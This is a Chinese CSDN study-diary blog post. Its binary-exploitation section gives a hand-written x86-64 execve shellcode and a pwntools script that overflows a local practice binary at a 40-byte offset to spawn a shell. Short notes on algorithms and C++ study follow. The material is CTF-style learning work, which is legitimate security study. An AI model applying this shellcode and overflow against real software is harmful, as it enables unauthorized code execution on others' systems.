9-6 (9-1?) 学习打卡(6.15)

最新推荐文章于 2024-06-27 13:01:56 发布
最新推荐文章于 2024-06-27 13:01:56 发布
阅读量317 收藏
点赞数
分类专栏: 究极学习打卡1.0
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_50166464/article/details/117917996
版权

现在 2021.6.15 AM9:06,某校企合作公司(推华为证书)过来疯狂输出压力,虽然懂的都懂,我还是挺好奇班里有些人是怎么想,不过我只好奇这门课到底作业麻不麻烦。--6.15

6.15 TO DO LIST:

一:每日Pwn学习

二:算法导论完成第二章两个算法 浏览第三章

三:CPP 第一章练习 浏览第二章

 

一:每日Pwn学习

今天试了一下64位的手写shellcode

首先vim ~/.gdbinit 改成peda

首先vmmap用vmmap查看段是有可执行权限的

和pwndbg操作都一样就不重复了

然后试pattern create 300

和pwndbg不同是这边是停在这个ret,然后不会跳错误的是哪个返回地址

推测就是栈上前8位

但这边细节的一点就是不用加0x 加0x就会报错

于是获取偏移为40

然后就是自写的shellcode_64

xor rax,rax
add rax,0x3b
xor rdi,rdi
push rdi
mov rdi,0x68732f2f6e69622f
push rdi
lea rdi,[rsp]
xor rsi,rsi
xor rdx,rdx
syscall

以及脚本

nasm -f elf64 -o shellcode_64.o shellcode_64.asm
#生成.o结尾的文件
#ld -m elf_amd64-64 -o shellcode_64_exe shellcode_64.o
#链接成可执行文件
objcopy -O binary shellcode_64.o shellcode_64
#提取可执行代码段,如果没有链接成可执行文件,从.o文件中提取也一样
rm -f shellcode_64.o
rm -f shellcode_64_exe

这边链接不成可执行文件,于是就跳过这一步,好像架构一直有问题搞不对

然后就可以上exp.py !

from pwn import *

p = process("./ret2shellcode_64")

e = ELF("./ret2shellcode_64")

buf2 = e.symbols["buf2"]

offset = 40

payload1 = offset*"P" + p64(buf2)

c = open("./shellcode_64","r")

shellcode = c.read()

payload2 = shellcode.ljust(200,"z")

p.recvuntil(": ")

p.sendline(payload1)

p.recvuntil(": ")

p.sendline(payload2)

p.interactive()

获取权限!

 

二:算法导论

完成阅读,完成算法。

问题就是没想到每次阅读都会掉进去,真希望有足够的时间给我慢慢看,算法还待优化,不过程序和程序员有一个能跑就行了(这次是我跑run)。

 

三:CPP

又是要带回去看的一天

现在十一点三十一,看完了第二章感觉还不错,这次感觉解决了之前的我一些细节,系统学习yyds。

night.

水番正文
关注
专栏目录
atlassian-confluence-6.15.1-x64.bin.tar.gz
10-21
《Atlassian Confluence 6.15.1:企业级知识管理与协作平台详解》 Atlassian Confluence,作为一款强大的企业级知识管理和协作平台,是Atlassian公司推出的旗舰产品之一。这款软件的核心功能在于帮助团队共享文档、...
最新版 EX 6.15 KEPServerEX-6.15.132.0 -2023正版
11-16
~如想免费下载版更多版本(EX5.X /EX6.X) 欢迎广大学友入讨论群学习(QQ讨论群:905485143) ~最新版 [EX 6.15] KEPServerEX-6.15.132.0 _正版_试用2H。 ~Kepware 产品下载一次将运行 2 小时。可以通过停止和启动...
9-6:js运算符;js数据类型;js函数;js对象;js事件;js字符串;js字符串方法;
JumpAndCheer的博客
09-25 179
js运算符: js算数运算符:用于对数字执行算数运算 + - * /(加减乘除) %(系数) ++(递加) --(递减) ** 幂 js赋值运算符:用于对js变量赋值 = += -= *= /= %= js字符串运算符: +字符串用于对字符串进行相加(concatenate 级联); +=运算符也可以用于相加(级联)字符串; 注意:在用于字符串时,+ 运算符被称为级联...
Week3-Day6 | 在打劫劫舍(1)上分类讨论
每天多一点干货
06-15 1382
面试的时候,问月期望薪资多少,自己说了 n,结果 offer 下来,给开了 n+6k,为啥(๑•̌.非常极限的一天盒马电话一面,上来先拷打项目,但是面试官很好,不像是那种冷冰冰的一问一答,像是在交流技。4月18开始投的第一个,断断续续投了几个,五月多了还在投,真的是太晚了,投的也太少了,真的是对现实情。985硕士,最近秋招,经朋友内部推荐,推荐到了佛山大家,简一陶瓷有限公司,数据分析岗,12k*12,本硕双非,本科科班,硕士调剂到水利来了(研0还没开学),想抽空重新把本科的Java捡起来,找实习再找。
考研进度记录表(2021.6-2021.11)
沉鱼叶的博客
05-30 1709
考研进度记录表
飞浆PaddlePaddle-百度架构师手把手带你零基础实践深度学习学习笔记)
weixin_46058482的博客
08-16 946
飞浆PaddlePaddle-百度架构师手把手带你零基础实践深度学习学习笔记) 百度架构师手把手带你零基础实践深度学习打卡学习笔记) 为什么学习飞浆PaddlePaddle,不得不说百度最近几年在国内发展人工智能的所做出的贡献,随着人工智能的不断发展,百度推出此框架是很好的学习方向。 1. 回顾第一天的学习之配置篇 零基础是指深度学习零基础,此次学习要求对python的语法有一定要求,建议先学习这个课程从0开始学Python -----------希望这些信息有助你做出更合理的判断----------
Linux实用操作学习笔记
qq_45348840的博客
02-05 1431
前面写了三篇Linux博客,加上这一批,也算是对Linux有个操作了,这一章在日常使用中也很有用,介绍了一些专业工具,软件下载、系统监控等等Linux的学习也就告一段落。但在今后,肯定会用到。命令太多了,就回来翻翻看看。好了,我的笔记到此结束。里面肯定有许许多多的bug,欢迎大家指出!毕竟这样成长更快。选项单独使用,和解压所需的其它参数分开[yang@yang 桌面]$ tar -xvf test.tar1.txt2.txt3.txt[yang@yang 桌面]$ ls。
【d-p】2024·六月
黄鹤遗址
06-04 1853
2024.06.01 to 2024.06.30
【春招笔试】2024-04-29-阿里国际-三语言题解
华鑫的专栏
06-16 777
根本找不到工作啊,都是骗子,关键是骗子也不骗我了,一天天抑郁的想嘎啊,究竟要怎样才能找到一份工作呢,我从加玛帝国走出,十年时间,闯荡大陆,遇敌无数,生死之间徘徊了不知道多少回,我所付出的,远比你这种所。之前在北京实习上咸鱼看的,然后提前一天去看的房,想问一下友友们,一般用什么租房,或者有一起合租的么,4月份发了个投票,一千多人参与了投票,评论区也有好多人说没找到offer,经过两个月的磨练,各位佬们。在学校上课接到实习电话,通过面试后叫我赶紧去实习,差不多半年的实习,讲讲实习体验吧:说真的毫无意义,
华为OD机试真题 - 可以组成网络的服务 (D卷,200分)
最新发布
每天多一点干货
06-27 969
牛客在线求职答疑中心# 请教大佬指点,本人双非本科,211硕士,北京互联网大厂总包30w,12%的。本人26届民办三本大二,计算机科班,目前学了C++,数据结构,Linux系统,Linux网络编程,m。[PK]# 本人211硕,目前有两个选择,一直在纠结,不知道怎么选择,国企基。我在一家亲师兄开的公司里实习,一个月才给我900块钱工资,我饭都快吃不起了,领导还跟我说,你还年轻,(一个mini视频播放器,大佬们,24届高考生,想学计算机,在华东理工,西南交大这种中上211,和兰州大学,中国海洋大学这种末。
node-v6.15.1-linux-armv6l.tar.xz
05-09
Node.js,简称Node,是一个开源且跨平台的JavaScript运行时环境,它允许在浏览器外运行JavaScript代码。Node.js于2009年由Ryan Dahl创立,旨在创建高性能的Web服务器和网络应用程序。它基于Google Chrome的V8 ...
node-v6.15.1-linux-armv6l.tar.gz
05-02
Node.js,简称Node,是一个开源且跨平台的JavaScript运行时环境,它允许在浏览器外运行JavaScript代码。Node.js于2009年由Ryan Dahl创立,旨在创建高性能的Web服务器和网络应用程序。它基于Google Chrome的V8 ...
KEPServerEX6-6.15.132
01-17
kepware 2024最新版
9-6学习打卡(6.14)
weixin_50166464的博客
06-14 577
昨天休息了一天(感觉是好久没休息了),打了一下午狼人杀剧本杀、打麻将,好快乐,不过一日不学果然心慌慌,不过我感觉学习模式该调整一下,每天起来得先写好list,要不然效率不够高 6.14 to do list: 1 ...
9-6学习打卡(6.12)
weixin_50166464的博客
06-12 179
本来想着CSDN发表一些题目的个人见解(但一直懒着没法,也可能感觉自己写的一般),最近受某学长推荐看算法导论和数据结构,并询问两位专业前辈意见,让我有个学习这两本书的一些思路
W-9610 DASCTF(7.31)
weixin_50166464的博客
08-01 177
一:DASCTF 打了一天题真是辛苦了我呢,距上被CTF打已经是前两个月了,签到及巅峰,再次明白赶紧学啊! 二:每日锻炼 今天本来不想锻炼,但愧于每日锻炼!今天坚持下来了。 NIGHT.
W-L学习打卡(7.8)
weixin_50166464的博客
07-08 167
突然发现好快就要去W-7城市,时间已经不多了,想好好躺几天,不过每天睡到十二点是大可不行了,老睡这么晚感觉把握不住时间了,明天开始十点半 十点 慢慢调整回九点,话不多说,写list了。--7.8 7.8 To do list: 1.Pwn笔记大杂烩出场 2.Cpp看完第七章 3.快速排序复现 4.每日锻炼 ...
Y-S 学习打卡 (9.1)
weixin_50166464的博客
09-02 163
沉默了许久,于寂然开始。 --9.1 9.1 To do list: 1.穿山甲第二天视频 2.CPP第十一章&练习题 3.拉伸
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值